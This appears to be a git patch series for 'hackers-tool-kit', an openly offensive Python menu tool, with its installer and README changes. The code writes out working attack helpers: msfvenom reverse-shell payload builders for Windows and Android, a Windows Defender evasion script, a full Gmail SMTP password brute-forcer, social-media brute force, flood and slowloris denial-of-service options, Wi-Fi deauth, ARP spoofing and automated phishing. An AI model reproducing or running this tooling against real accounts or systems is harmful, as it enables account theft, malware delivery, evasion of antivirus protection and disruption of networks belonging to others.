Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +def terminal(): + os.system("gnome-terminal") +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + found = True +mainbanner() +main() diff --git a/install.py b/install.py new file mode 100644 index 0000000..456e1fa --- /dev/null +++ b/install.py @@ -0,0 +1,107 @@ +import sys +import os + +def install(): + os.system("apt install dirb") + os.system("apt install sslstrip") + os.system("apt install bettercap") + os.system("apt install sslscan") + os.system("apt install crunch") + os.system("apt install tcpdump") + os.system("apt install macchanger") + os.system("apt install wafw00f") + os.system("apt install medusa") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("apt update") + os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("pip install colorama") + os.system("pip install dnspython") + os.system("pip install shodan") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat -y") + os.system("apt install nc") + os.system("apt install neofetch") + os.system("apt install cupp") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") + + + +print "are you running on the real kali linux os [y/n]" +check = raw_input("[y/n]> ") +if check == "y" : + print "ok most tools should work for you you might have to install other" + print "things on your os for this to work if it doesnt work" + os.system("sleep 2") + install() + +if check == "n" : + print "then some of the tools in this script might not work" + print "do you want to continue installation [y/n]" + install = raw_input("[y/n]> ") + if install == "y" : + def install(): + os.system("apt install dirb") + os.system("apt install sslstrip") + os.system("apt install bettercap") + os.system("apt install sslscan") + os.system("apt install crunch") + os.system("apt install tcpdump") + os.system("apt install macchanger") + os.system("apt install wafw00f") + os.system("apt install medusa") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("apt update") + os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat") + os.system("apt install nc") + os.system("apt install neofetch") + os.system("apt install cupp") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") + + install() + if install == "n" : + print "thanks for checking out my script" + sys.exit() From ff063dac4b412894d7898aef7db6f393f72bafe3 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 1 Apr 2019 21:54:24 +0100 Subject: [PATCH 081/214] Update README.md --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c38d9bf..f78a1d8 100644 --- a/README.md +++ b/README.md @@ -38,11 +38,10 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates - -* updated arpspoof option - * added a open new terminal option * added aircrack-ng automated option * added a source code grabber option + +* added a web directory scanner option From 0b548b4504766eaf113f5e47584f8601437a1888 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 6 Apr 2019 17:48:20 +0100 Subject: [PATCH 082/214] Delete htk.py --- htk.py | 2063 -------------------------------------------------------- 1 file changed, 2063 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index de6d1da..0000000 --- a/htk.py +++ /dev/null @@ -1,2063 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ 